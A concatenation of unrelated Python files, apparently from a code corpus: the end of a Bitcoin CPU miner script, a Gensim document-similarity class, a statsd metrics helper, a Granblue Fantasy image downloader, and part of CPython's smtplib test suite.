if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 20582
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
docsim.py
|
"""
Semantic document similarity using Gensim
@author: 4oh4
28/03/2020
This class is based on the Gensim Soft Cosine Tutorial notebook:
https://github.com/RaRe-Technologies/gensim/blob/develop/docs/notebooks/soft_cosine_tutorial.ipynb
"""
import logging
from re import sub
import threading
from multiprocessing import cpu_count
import numpy as np
import gensim.downloader as api
from gensim.utils import simple_preprocess
from gensim.corpora import Dictionary
from gensim.models import TfidfModel
from gensim.models import WordEmbeddingSimilarityIndex
from gensim.similarities import SparseTermSimilarityMatrix
from gensim.similarities import SoftCosineSimilarity
from gensim.models.keyedvectors import Word2VecKeyedVectors
# Import and download the most up-to-date stopwords from NLTK
# from nltk import download
# from nltk.corpus import stopwords
# download('stopwords') # Download stopwords list.
# nltk_stop_words = set(stopwords.words("english"))
# Or use a hard-coded list of English stopwords
nltk_stop_words = {'a','about','above','after','again','against','ain','all','am','an','and','any','are','aren',"aren't",'as','at','be','because','been','before','being','below','between','both','but','by','can','couldn',"couldn't",'d','did','didn',"didn't",'do','does','doesn',"doesn't",'doing','don',"don't",'down','during','each','few','for','from','further','had','hadn',"hadn't",'has','hasn',"hasn't",'have','haven',"haven't",'having','he','her','here','hers','herself','him','himself','his','how','i','if','in','into','is','isn',"isn't",'it',"it's",'its','itself','just','ll','m','ma','me','mightn',"mightn't",'more','most','mustn',"mustn't",'my','myself','needn',"needn't",'no','nor','not','now','o','of','off','on','once','only','or','other','our','ours','ourselves','out','over','own','re','s','same','shan',"shan't",'she',"she's",'should',"should've",'shouldn',"shouldn't",'so','some','such','t','than','that',"that'll",'the','their','theirs','them','themselves','then','there','these','they','this','those','through','to','too','under','until','up','ve','very','was','wasn',"wasn't",'we','were','weren',"weren't",'what','when','where','which','while','who','whom','why','will','with','won',"won't",'wouldn',"wouldn't",'y','you',"you'd","you'll","you're","you've",'your','yours','yourself','yourselves'}
class NotReadyError(Exception):
pass
class DocSim:
"""
Find documents that are similar to a query string.
Calculated using word similarity (Soft Cosine Similarity) of word embedding vectors
Example usage:
# Use default model (glove-wiki-gigaword-50)
docsim = DocSim()
docsim.similarity_query(query_string, documents)
# Or, specify a preferred, pre-existing Gensim model with custom stopwords and verbose mode
docsim = DocSim(model='glove-twitter-25', stopwords=['the', 'and', 'are'], verbose=True)
docsim.similarity_query(query_string, documents)
# Or, supply a custom pre-initialised model in gensim.models.keyedvectors.Word2VecKeyedVectors format
docsim = DocSim(model=myModel)
docsim.similarity_query(query_string, documents)
"""
default_model = "glove-wiki-gigaword-50"
model_ready = False # Only really relevant to threaded sub-class
def __init__(self, model=None, stopwords=None, verbose=False):
# Constructor
self.verbose = verbose
self.setup_model(model)
if stopwords is None:
self.stopwords = nltk_stop_words
else:
self.stopwords = stopwords
def setup_model(self, model):
# Determine which model to use, download/load it, and create the similarity_index
if isinstance(model, Word2VecKeyedVectors):
# Use supplied model
self.model = model
elif isinstance(model, str):
# Try to download named model
if self.verbose:
print(f'Loading word vector model: {model}')
self.model = api.load(model)
if self.verbose:
print('Model loaded')
elif model is None:
# Download/use default GloVe model
if self.verbose:
print(f'Loading default GloVe word vector model: {self.default_model}')
self.model = api.load(self.default_model)
if self.verbose:
print('Model loaded')
else:
raise ValueError('Unable to load word vector model')
self.similarity_index = WordEmbeddingSimilarityIndex(self.model)
self.model_ready = True
def preprocess(self, doc: str):
# Clean up input document string, remove stopwords, and tokenize
        doc = sub(r'<img[^<>]+(>|$)', " image_token ", doc)  # replace <img ...> tags with a placeholder token
        doc = sub(r'<[^<>]+(>|$)', " ", doc)  # strip any remaining HTML/XML tags
        doc = sub(r'\[img_assist[^]]*?\]', " ", doc)  # drop [img_assist ...] shortcodes
        # replace URLs with a placeholder token
        doc = sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', " url_token ", doc)
return [token for token in simple_preprocess(doc, min_len=0, max_len=float("inf")) if token not in self.stopwords]
def _softcossim(self, query: str, documents: list):
# Compute Soft Cosine Measure between the query and each of the documents.
query = self.tfidf[self.dictionary.doc2bow(query)]
index = SoftCosineSimilarity(
self.tfidf[[self.dictionary.doc2bow(document) for document in documents]],
self.similarity_matrix)
similarities = index[query]
return similarities
def similarity_query(self, query_string: str, documents: list):
"""
Run a new similarity ranking, for query_string against each of the documents
Arguments:
query_string: (string)
documents: (list) of string documents to compare query_string against
            explain: (bool) if True, highest scoring words are also returned
                (not used by the current implementation)
        Returns:
            list: similarity scores for each of the documents
        Raises:
            NotReadyError: if the model is not ready/available
"""
if self.model_ready:
corpus = [self.preprocess(document) for document in documents]
query = self.preprocess(query_string)
if set(query) == set([word for document in corpus for word in document]):
                raise ValueError('query_string fully overlaps the content of the document corpus')
if self.verbose:
print(f'{len(corpus)} documents loaded into corpus')
self.dictionary = Dictionary(corpus+[query])
self.tfidf = TfidfModel(dictionary=self.dictionary)
self.similarity_matrix = SparseTermSimilarityMatrix(self.similarity_index,
self.dictionary, self.tfidf)
scores = self._softcossim(query, corpus)
return scores.tolist()
else:
raise NotReadyError('Word embedding model is not ready.')
class DocSim_threaded(DocSim):
"""
    Threaded version that loads the model (a long-running process) in the background. Everything else is the same as the standard version.
Find documents that are similar to a query string.
Calculated using word similarity (Soft Cosine Similarity) of word embedding vectors
Example usage:
docsim = DocSim_threaded()
docsim.similarity_query(query_string, documents)
"""
def __init__(self, model=None, stopwords=None, verbose=False):
# Constructor
self.verbose = verbose
self._threaded_load(model)
        if stopwords is None:
            self.stopwords = nltk_stop_words
        else:
            self.stopwords = stopwords
def _threaded_load(self, model):
"""
# Setup the model in a separate thread
"""
self.thread = threading.Thread(target=self.setup_model, args=[model])
        self.thread.daemon = True  # setDaemon() is deprecated; set the attribute directly
self.thread.start()
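# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module).  A minimal
# end-to-end run of the pipeline above, assuming gensim can download the
# default "glove-wiki-gigaword-50" vectors.  similarity_query() returns one
# soft-cosine score per document, in the same order as `documents`.
if __name__ == '__main__':
    documents = [
        'Machine learning with word embeddings',
        'A recipe for lemon drizzle cake',
        'Deep learning for natural language processing',
    ]
    docsim = DocSim(verbose=True)
    scores = docsim.similarity_query('neural networks for text', documents)
    for doc, score in zip(documents, scores):
        print(f'{score:.3f}  {doc}')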
|
metrics.py
|
import logging
import sys
import functools
import threading
import statsd
LOG = logging.getLogger(__name__)
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class Metrics():
def __init__(self, host, port):
self._port = port
self.statsd = statsd.StatsClient(host, port)
@threaded
def counter(self, incoming, tag):
method = incoming.message.get('method')
stat = "{}.{}".format(tag, method)
self.statsd.incr(stat)
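# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module).  It assumes a
# statsd daemon listening on localhost:8125 and that incoming objects expose
# a dict-like `message` attribute, which is all counter() above relies on.
# FakeIncoming and the "notifications" tag are made up for the demo.
if __name__ == '__main__':
    class FakeIncoming:
        message = {'method': 'create_instance'}

    metrics = Metrics('localhost', 8125)
    worker = metrics.counter(FakeIncoming(), 'notifications')  # returns the Thread
    worker.join()  # wait for the fire-and-forget "notifications.create_instance" increment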
|
pyGBFexchara.py
|
# Batch-download the extra (non-roster) half-body character portraits used in GBF story quests
from queue import Queue
import os
import time
import threading
import urllib.request
import urllib.error
import datetime
import sys
sys.path.append(".")
import pyDownload as download
dirname = os.getcwd()
print_lock = threading.Lock()
data_q = Queue()
SAVELINK = False
DEBUG = False
prefix1 = "http://game-a.granbluefantasy.jp/assets/img/sp/quest/scene/character/body/"
groupstr = ["3040070000_unarmed",
"3040070000_unarmed2",
"3040070000_cockpit",
"3040028000_cockpit"]
explist = ["","_angry","_cutin","_eye",
"_joy","_laugh3","_laugh2","_laugh",
"_mood","_mortifying","_surprise_fe","_sad",
"_suddenly","_serious","_surprise","_shy",
"_think","_weak","_01","_02","_03"]
# chara[R/SR/SSR/skin] quest[r/sr/ssr/extra] summon[n/r/sr/ssr] zoom[r/sr/ssr/skin] mypage[r/sr/ssr/skin] class cover
groupdir = ["img\\quest\\exorder"]
grouplink = ["link\\quest-exo.txt"]
MaxThread = 40
def mkdir(path):
tmppath = os.getcwd()+"\\"+path
try:
os.makedirs(tmppath)
except:
pass
return tmppath
def saveIndex(imgData):
time.sleep(0.1)
with print_lock:
for iexp in explist:
dir = groupdir[0]
count = 0
try:
url = prefix1 + imgData +iexp+ ".png"
if(download.saveImg(url,dir)):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[0],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
def worker():
while True:
imgData1 = data_q.get()
#print(imgData1)
saveIndex(imgData1)
data_q.task_done()
def main():
#socket.setdefaulttimeout(10)
if(sys.version_info.major != 3):
print("This script only works for python3")
return
try:
logdata = ""
with open("img\\exo-log.txt") as logfile:
lines = logfile.readlines()
# if(len(lines) == len(groupstr)):
# print("Already the latest!")
# return
# elif(len(groupdir)>len(lines)):
# lastpoint = len(lines)
except:
pass
for x in range(MaxThread):
t = threading.Thread(target = worker)
t.daemon = True
t.start()
for idir in groupdir:
mkdir(idir)
mkdir("link")
start = time.time()
simglist = []
# init
for istr in groupstr:
data_q.put(istr)
data_q.join()
print("entire job took:", time.time()-start)
# today = str(datetime.date.today())
with open("img\\exo-log.txt", "w", encoding='utf-8') as logfile:
for ilog in groupstr:
istr = str(ilog)+","
logfile.write(istr)
logfile.write("\n")
if __name__ == '__main__':
main()
os.system("pause")
#appendix
#weapon
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/weapon/m/1040001600.jpg
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/b/1040001600.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/ls/1040500300.jpg
#image set
#character origin zoom
#skin
#3710001000
# http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/zoom/3040010000_01.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/b/3030007000_01.png
#class
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/job_change/120001_wa_1_01.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/cjs/job_release_180001_1_c.png
#quest character 2 3 4 99
#http://game-a1.granbluefantasy.jp/assets/img/sp/quest/scene/character/body/3040022000.png
#summon 1 2 3 4
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/summon/b/2030011000.png
#mypage class&sr
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/my/3040058000_02.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/my/140201_kn_1_01.png
#not used
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/npc_evolution/main/3040071000_02.png
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST
from test.support import threading_setup, threading_cleanup, join_thread
from test.support import requires_hashdigest
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
smtplib.SMTP(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
